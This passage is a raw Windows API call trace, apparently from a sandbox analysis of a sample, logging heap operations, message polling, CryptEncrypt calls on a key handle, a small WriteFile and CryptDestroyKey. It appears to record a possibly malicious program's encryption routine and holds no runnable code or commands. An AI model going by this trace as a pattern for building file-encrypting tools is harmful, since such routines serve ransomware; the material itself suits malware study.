wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0174.663] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0174.663] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0174.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0174.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0174.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacc0 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacf0 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0174.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0174.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0174.666] CryptEncrypt (in: hKey=0x9e1b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.667] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.667] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.667] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.667] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0174.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaac18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0174.667] CryptEncrypt (in: hKey=0x9e1b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72778*, pdwDataLen=0x8cef60*=0x8) returned 1 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.668] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0174.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.668] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0174.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.668] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0174.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.668] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0174.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.669] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.669] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.669] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.669] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.669] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.669] WriteFile (in: hFile=0x4fc, lpBuffer=0x2a72698*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72698*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0174.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.670] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0174.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.670] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0174.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.670] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.670] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0174.670] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.670] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0174.670] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.670] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0174.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0174.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa990, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0174.671] CryptDestroyKey (hKey=0x9e1b78) returned 1 [0174.671] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.671] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0174.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.671] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0174.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.671] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0174.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.671] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0174.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.671] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.671] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.671] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.671] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.671] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0174.672] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, 